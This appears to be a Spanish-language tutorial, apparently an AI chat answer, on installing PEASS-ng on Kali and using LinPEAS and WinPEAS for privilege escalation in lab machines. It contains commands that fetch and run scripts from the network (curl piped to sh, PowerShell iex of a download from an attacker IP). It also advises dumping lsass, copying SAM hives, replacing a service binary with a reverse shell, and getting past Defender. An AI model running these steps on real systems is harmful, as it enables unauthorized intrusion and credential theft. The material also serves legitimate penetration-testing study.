Instalar PEASS en Kali Linux
Instalar PEASS en Kali Linux
Para instalar PEASS-ng (Privilege Escalation Awesome Scripts Suite) en Kali Linux, tienes un par de opciones dependiendo de si quieres el paquete pre-compilado o los scripts directamente desde el repositorio oficial.
Aquí tienes los pasos detallados:
1. Instalación mediante APT
Kali Linux incluye peass en sus repositorios oficiales. Esta es la forma más rápida de tener las herramientas disponibles en tu sistema.
sudo apt update
sudo apt install peass
Una vez instalado, los archivos se guardarán generalmente en el directorio:
/usr/share/peass/
2. Contenido de PEASS
Al instalarlo, obtendrás las dos herramientas principales de la suite:
LinPEAS: Script para enumeración y búsqueda de vectores de escalada de privilegios en Linux/Unix.
WinPEAS: Ejecutables (.exe y .bat) para enumeración en Windows.
3. Cómo localizarlos rápidamente
Después de la instalación, puedes listar los archivos instalados para ver dónde quedó cada binario o script:
dpkg -L peass
O simplemente navegar a la carpeta de herramientas de enumeración:
cd /usr/share/peass
ls -R
4. Alternativa: Descarga directa (Recomendado)
Dado que PEASS se actualiza casi a diario, a veces la versión de apt puede estar un poco por detrás de la última técnica descubierta. Muchos profesionales prefieren descargar el .sh directamente para asegurar que tienen lo último:
# Para LinPEAS
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Nota de seguridad: Recuerda que estas herramientas están diseñadas para auditorías de seguridad y hacking ético. Úsalas siempre en entornos controlados o con la debida autorización.
Si estás en un laboratorio (como HTB, THM o practicando para el OSCP), el reto suele ser cómo pasar el script a la máquina víctima y ejecutarlo sin que se rompa nada.
Aquí tienes el "combo" más común para hacerlo de forma rápida y profesional:
1. Prepara el servidor en tu Kali
Primero, ve a la carpeta donde tienes el script y levanta un servidor temporal con Python:
cd /usr/share/peass/linpeas/
python3 -m http.server 8000
2. Descarga y ejecuta en la víctima
Una vez dentro de la máquina remota (vía SSH o Reverse Shell), tienes tres formas clásicas de ejecutarlo según lo que esté instalado:
Opción A: Ejecución en memoria (La más limpia)
No deja rastro del archivo en el disco, lo cual es ideal para no ensuciar la máquina:
curl -s http://<TU_IP_KALI>:8000/linpeas.sh | sh
Opción B: Usando wget (Si curl no está)
wget http://<TU_IP_KALI>:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Opción C: Guardar la salida en un archivo
A veces el reporte es tan largo que la terminal se "come" las líneas de arriba. Es mejor guardarlo para leerlo con calma:
./linpeas.sh > reporte.txt
# Luego lo lees con:
less -r reporte.txt
💡 Tips Pro para Laboratorios:
Colores: Si no ves los colores (que son vitales en LinPEAS), usa el parámetro
-c:./linpeas.sh -c. El amarillo sobre rojo es casi siempre victoria directa (vector de escalada confirmado).Falsos positivos: LinPEAS es muy "ruidoso". Si ves algo interesante pero no estás seguro, busca la sección de "Extra Mile" o revisa los archivos de configuración que el script resalta.
Si estás en una máquina Windows (HTB, THM o laboratorios tipo OSCP), la cosa cambia un poco porque Windows suele ser más "quisquilloso" con los binarios y el antivirus (aunque en labs suele estar relajado).
Para Windows tienes WinPEAS, que viene en dos sabores: .exe (binario compilado) y .bat (script de comandos).
1. ¿Cuál usar?
WinPEASany.exe: Es la versión más completa (.NET). Requiere que la víctima tenga instalado .NET Framework (normalmente 4.0 o superior).
winpeas.bat: Es más limitado, pero no requiere dependencias. Si el
.exete da errores de arquitectura o de .NET, usa este.
2. Cómo pasarlo a la víctima (Desde tu Kali)
Primero, localiza el archivo en tu Kali (si instalaste peass vía apt):
cd /usr/share/peass/winpeas/
Levanta tu servidor:
python3 -m http.server 8000
En la máquina Windows (Víctima):
Usa PowerShell para descargarlo. Es el método más fiable:
# Descargar el ejecutable
iwr http://<TU_IP_KALI>:8000/winpeasany.exe -OutFile winpeas.exe
# O si prefieres ejecutarlo directamente en memoria (sin guardar en disco)
iex (iwr -UseBasicParsing http://<TU_IP_KALI>:8000/winpeas.exe)
3. Ejecución y qué buscar
Una vez lo tengas dentro, ejecútalo. Si quieres que el reporte sea legible y no se pierda el scroll, guárdalo en un archivo de texto:
winpeas.exe > log.txt
type log.txt
Fíjate en los colores (¡Vital!):
Rojo/Amarillo: ¡Bingo! Hay un 95% de probabilidades de que ese sea el vector de escalada (ej: contraseñas en registro, privilegios
SeImpersonate, servicios mal configurados).Rojo: Es algo que deberías mirar con lupa.
Azul: Información del sistema/usuarios.
💡 Un consejo extra para Windows:
Si el .exe te da problemas de ejecución o el Defender (si estuviera activo) te lo borra, intenta usar la versión obfuscated (si la tienes) o recurre al viejo pero confiable winpeas.bat, que suele saltarse algunas restricciones por ser solo scripts de comandos.
¡Entonces ese es tu primer paso obligado! Antes de lanzar WinPEAS (que genera mucho ruido y saca muchísima información), ejecuta este comando en la terminal de la máquina Windows:
whoami /priv
¿Por qué es tan importante?
En los laboratorios tipo OSCP o HackTheBox, la escalada de privilegios en Windows suele estar ligada a "tokens" o privilegios específicos del usuario actual. Si ves alguno de estos en estado Enabled (Habilitado), tienes el 90% del trabajo hecho:
| Privilegio | Por qué es oro puro |
| SeImpersonatePrivilege | Permite ataques tipo PrintSpoofer o JuicyPotato. Es una escalada a SYSTEM casi garantizada. |
| SeDebugPrivilege | Puedes volcar la memoria de procesos (como lsass.exe) para sacar hashes o contraseñas en claro. |
| SeBackupPrivilege | Te permite copiar archivos restringidos (como la base de datos SAM y SYSTEM) para crackearlos offline. |
| SeTakeOwnershipPrivilege | Puedes hacerte dueño de cualquier archivo del sistema (como un servicio que corre como SYSTEM). |
Si no ves nada interesante en whoami /priv:
Entonces es el momento de que WinPEAS haga su magia. Ejecútalo y busca específicamente estas secciones en el reporte:
Checking Unquoted Service Paths: Servicios que tienen espacios en su ruta y no tienen comillas (un clásico de Windows).
Modifiable Services: Servicios donde tu usuario tiene permisos de escritura (puedes cambiar el
.exedel servicio por un reverse shell).AutoLogon credentials: Contraseñas guardadas en el registro de Windows.
AlwaysInstallElevated: Si esta clave está en
1, puedes instalar un archivo.msimalicioso y se ejecutará como SYSTEM.
Tip Pro: Si el reporte de WinPEAS es demasiado largo, puedes buscar palabras clave rápidamente con findstr:
winpeas.exe | findstr /i "password credential"